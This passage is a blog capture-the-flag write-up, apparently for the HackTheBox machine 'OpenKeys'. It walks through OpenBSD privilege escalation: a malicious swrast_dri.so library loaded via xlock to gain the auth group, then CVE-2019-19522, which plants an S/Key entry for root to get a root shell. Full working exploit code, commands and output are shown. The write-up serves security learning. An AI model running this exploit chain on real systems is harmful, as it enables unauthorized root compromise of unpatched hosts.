<p>Next, it tries to load the driver <code class="language-plaintext highlighter-rouge">swrast_dri.so</code> so we‚Äôll create a malicious <code class="language-plaintext highlighter-rouge">swrast_dri.c</code> which executes a shell, we‚Äôll take the code from Qualys POC and compile it, and run xlock which triggers our script, resulting in making our user a part of <code class="language-plaintext highlighter-rouge">auth</code> group:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
</pre></td> --><td class="rouge-code"><pre>openkeys<span class="nv">$ </span><span class="nb">cd</span> ~
openkeys<span class="nv">$ </span><span class="nb">cat</span> <span class="o">&gt;</span> swrast_dri.c <span class="o">&lt;&lt;</span> <span class="sh">"</span><span class="no">EOF</span><span class="sh">"
&gt; #include &lt;paths.h&gt;
&gt; #include &lt;sys/types.h&gt;
&gt; #include &lt;unistd.h&gt;
&gt; static void __attribute__ ((constructor)) _init (void) {
&gt;     gid_t rgid, egid, sgid;
&gt;     if (getresgid(&amp;rgid, &amp;egid, &amp;sgid) != 0) _exit(__LINE__);
&gt;     if (setresgid(sgid, sgid, sgid) != 0) _exit(__LINE__);
&gt;     char * const argv[] = { _PATH_KSHELL, NULL };
&gt;     execve(argv[0], argv, NULL);
&gt;     _exit(__LINE__);
&gt; }
&gt; EOF
openkeys</span><span class="nv">$ </span><span class="sh">ls
swrast_dri.c user.txt
openkeys</span><span class="nv">$ </span><span class="sh">gcc -fpic -shared -s -o swrast_dri.so swrast_dri.c
openkeys</span><span class="nv">$ </span><span class="sh">env -i /usr/X11R6/bin/Xvfb :66 -cc 0 &amp;
[2] 98977
openkeys</span><span class="nv">$ </span><span class="sh">_XSERVTransmkdir: Owner of /tmp/.X11-unix should be set to root

openkeys</span><span class="nv">$ </span><span class="sh">env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display :66

openkeys</span><span class="nv">$ </span><span class="sh">id
uid=1001(jennifer) gid=11(auth) groups=1001(jennifer), 0(wheel)

</span></pre></td></tr></tbody></table></code></pre></div></div>

<h3 id="manual-exploitation-cve-2019-19522">Manual Exploitation CVE-2019-19522</h3>

<p>Now that we are a member of auth group, we can move ahead exploiting CVE-2019-19522 to gain root:</p>

<blockquote>
  <p>If the S/Key or YubiKey authentication type is enabled (they are both installed by default but disabled), then a local attacker can exploit the privileges of the group ‚Äúauth‚Äù to obtain the full privileges of the user ‚Äúroot‚Äù (because login_skey and login_yubikey do not verify that the files in /etc/skey and /var/db/yubikey belong to the correct user, and these directories are both writable by the group ‚Äúauth‚Äù)</p>
</blockquote>

<p>Since the <code class="language-plaintext highlighter-rouge">/etc/skey</code> directory is writable by <code class="language-plaintext highlighter-rouge">auth</code> group, following the POC we‚Äôll write the config file for root and change permission to 600:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td> --><td class="rouge-code"><pre>openkeys<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-ld</span> /etc/skey/
drwx-wx--T  2 root  auth  512 Nov 28 18:47 /etc/skey/

openkeys<span class="nv">$ </span><span class="nb">echo</span> <span class="s1">'root md5 0100 obsd91335 8b6d96e0ef1b1c21'</span> <span class="o">&gt;</span> /etc/skey/root
openkeys<span class="nv">$ </span><span class="nb">chmod </span>0600 /etc/skey/root
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Next, we clear the environment and set the terminal to run skey and use password <code class="language-plaintext highlighter-rouge">EGG LARD GROW HOG DRAG LAIN</code> which returns the root shell.</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre></td> --><td class="rouge-code"><pre>openkeys<span class="nv">$ </span><span class="nb">env</span> <span class="nt">-i</span> <span class="nv">TERM</span><span class="o">=</span>vt220 su <span class="nt">-l</span> <span class="nt">-a</span> skey
otp-md5 99 obsd91335
S/Key Password:
openkeys# <span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>wheel<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>0<span class="o">(</span>wheel<span class="o">)</span>, 2<span class="o">(</span>kmem<span class="o">)</span>, 3<span class="o">(</span>sys<span class="o">)</span>, 4<span class="o">(</span><span class="nb">tty</span><span class="o">)</span>, 5<span class="o">(</span>operator<span class="o">)</span>, 20<span class="o">(</span>staff<span class="o">)</span>, 31<span class="o">(</span>guest<span class="o">)</span>
openkeys# <span class="nb">whoami
</span>root
openkeys# <span class="nb">wc</span> <span class="nt">-c</span> root.txt
      33 root.txt
openkeys# <span class="nb">cat </span>root.txt
f3a553b1697050<span class="k">******************</span>

</pre></td></tr></tbody></table></code></pre></div></div>

<p>And we pwned the Box !</p>

<p>Thanks for reading, Suggestions &amp; Feedback are appreciated !</p>
:ET